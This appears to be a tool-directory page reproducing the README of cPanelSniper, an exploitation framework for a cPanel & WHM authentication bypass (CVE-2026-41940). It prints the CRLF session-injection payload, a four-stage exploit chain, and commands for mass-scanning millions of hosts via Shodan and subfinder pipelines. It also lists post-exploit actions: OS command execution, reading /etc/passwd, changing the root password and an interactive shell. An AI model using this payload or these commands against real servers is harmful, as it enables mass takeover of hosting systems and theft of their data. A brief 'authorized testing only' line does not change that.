Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacyΒ© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
cpsniper β€” cPanelSniper STABLE - CVE-2026-41940 optimized for 10M+ targets | Kitploit
Tools/GitHubGitHub/44pie/cpsniper
Authentication & AuthorizationVulnerability ScannersExploitationWeb Application ExploitationPost-ExploitationPenetration TestingCommand and ControlRed Teaming
GitHub44pie/cpsniper

cpsniper

cPanelSniper STABLE - CVE-2026-41940 optimized for 10M+ targets

View Repository
2214 months agoNot yet reviewed

Most Popular

View all β†’

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools β†’
Share

cPanelSniper

cPanelSniper

Python CVE cPanel stdlib pipeline Author

CVE-2026-41940 β€” cPanel & WHM Authentication Bypass via Session-File CRLF Injection
4-stage exploit chain Β· Interactive WHM Shell Β· TRUE STABLE for 10M+ targets Β· Zero memory usage Β· stdlib only


Overview

cPanelSniper is a focused exploitation framework for CVE-2026-41940, a critical authentication bypass vulnerability affecting cPanel & WHM. The vulnerability allows unauthenticated remote attackers to gain root-level WHM access by injecting CRLF sequences into the session file via the Authorization HTTP header β€” without any valid credentials.

  • CVSS Score: 10.0 (Critical)
  • In-the-wild exploitation: Confirmed (April 2026)
  • Affected installs: ~70 million domains running cPanel & WHM
  • No dependencies: Pure Python stdlib β€” no pip, no requests, no external packages

For authorized penetration testing and bug bounty programs only.


⚑ TRUE STABLE VERSION

This version is optimized for scanning 10,000,000+ targets with ZERO memory usage.

What Was Fixed

ProblemOriginal VersionFixed Version
Memory UsageLoads all targets into RAMStreams targets line-by-line (0 memory)
10M TargetsOOM β†’ Killed ❌Completes successfully βœ…
ResumeNot supported--resume flag
ProgressNo ETAReal-time ETA + rate + stats
ResultsSaved only at endSaved every 60s (configurable)

Key Features

  • Streaming architecture - Process 10M+ targets without loading into memory
  • Zero OOM crashes - Even with very large target lists
  • Auto-resume - Continue from where you stopped with --resume
  • Real-time progress - ETA, scan rate, error tracking
  • Periodic saves - Results auto-saved to prevent data loss
  • Pipeline ready - Works seamlessly with subfinder, httpx, shodan

How It Works

The root cause lives in Session.pm: the saveSession() function calls filter_sessiondata() after writing the session file to disk. This means CRLF characters embedded in the Authorization: Basic header value are written verbatim into the session file, injecting attacker-controlled fields before sanitization occurs.

Normal flow:
  POST /login/ β†’ filter_sessiondata() β†’ write session β†’ auth check

Vulnerable flow:
  POST /login/ β†’ write session (CRLF payload injected) β†’ filter_sessiondata() β†’ auth check reads poisoned file

The CRLF Payload

The Authorization: Basic value decodes to:

root:x
successful_internal_auth_with_timestamp=9999999999
user=root
tfa_verified=1
hasroot=1

These fields are written directly into the session file on disk. When read back, cPanel treats the session as a fully authenticated root session.

4-Stage Exploit Chain

β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚  Stage 0 β€” Canonical Hostname Discovery                     β”‚
β”‚  GET /openid_connect/cpanelid β†’ 307 β†’ real hostname         β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚  Stage 1 β€” Mint Preauth Session                             β”‚
β”‚  POST /login/?login_only=1  (wrong creds)                   β”‚
β”‚  ← 401 + whostmgrsession cookie                             β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚  Stage 2 β€” CRLF Injection                                   β”‚
β”‚  GET / + Cookie: session + Authorization: Basic <payload>   β”‚
β”‚  cpsrvd writes CRLF fields into session file                β”‚
β”‚  ← 307 Location: /cpsessXXXXXXXXXX/...                     β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚  Stage 3 β€” Propagate (do_token_denied gadget)               β”‚
β”‚  GET /scripts2/listaccts                                    β”‚
│  Triggers raw→cache flush — injected fields become active   │
β”‚  ← 401 Token denied (expected)                              β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚  Stage 4 β€” Verify WHM Root Access                           β”‚
β”‚  GET /cpsessXXXXXXXXXX/json-api/version                     β”‚
β”‚  ← 200 {"version":"11.x.x.x","result":1}  = PWNED          β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

Affected Versions

BranchVulnerablePatched
110.x≀ 11.110.0.9611.110.0.97
118.x≀ 11.118.0.6211.118.0.63
126.x≀ 11.126.0.5311.126.0.54
132.x≀ 11.132.0.2811.132.0.29
134.x≀ 11.134.0.1911.134.0.20
136.x≀ 11.136.0.411.136.0.5

Installation

git clone https://github.com/44pie/cpsniper
cd cpsniper
python3 cPanelSniper.py --help

No pip install required. Pure Python 3.8+ stdlib only.


Usage

Basic Scan

# Single target β€” scan only
python3 cPanelSniper.py -u https://target.com:2087

# Single target β€” interactive shell after bypass
python3 cPanelSniper.py -u https://target.com:2087 --action shell

# Large target list β€” 10M+ targets (TRUE STABLE)
python3 cPanelSniper.py -l targets.txt -t 50 -o results.json

# Resume interrupted scan
python3 cPanelSniper.py -l targets.txt -t 50 -o results.json --resume

Post-Exploit Actions

# List all cPanel accounts on the server
python3 cPanelSniper.py -u https://target.com:2087 --action list

# Execute OS command
python3 cPanelSniper.py -u https://target.com:2087 --action cmd --cmd "id;whoami;uname -a"
python3 cPanelSniper.py -u https://target.com:2087 --action cmd --cmd "ls /home"
python3 cPanelSniper.py -u https://target.com:2087 --action cmd --cmd "cat /etc/passwd"

# Get server info (hostname, load, disk, MySQL host)
python3 cPanelSniper.py -u https://target.com:2087 --action info

# Get cPanel version
python3 cPanelSniper.py -u https://target.com:2087 --action version

# Change root password
python3 cPanelSniper.py -u https://target.com:2087 --action passwd --passwd 'NewPass@2026!'

# Interactive WHM shell
python3 cPanelSniper.py -u https://target.com:2087 --action shell

Pipelines (TRUE STABLE for Large Lists)

# subfinder β†’ httpx β†’ save to file β†’ scan 10M+ targets
subfinder -d target.com -silent | \
  httpx -silent -ports 2087,2086 -threads 50 > targets.txt
python3 cPanelSniper.py -l targets.txt -t 50 -o results.json

# From scope list - handle millions of domains
cat scope.txt | \
  httpx -silent -ports 2087,2086 -threads 100 > targets.txt
python3 cPanelSniper.py -l targets.txt -t 50 -o results.json --resume

# Shodan results - massive scan
shodan search --fields ip_str,port 'title:"WHM Login"' | \
  awk '{print "https://"$1":"$2}' > targets.txt
python3 cPanelSniper.py -l targets.txt -t 30 -o shodan_results.json

# stdin pipe - for small lists only (<100K)
echo "https://target.com:2087" | python3 cPanelSniper.py
Download Tool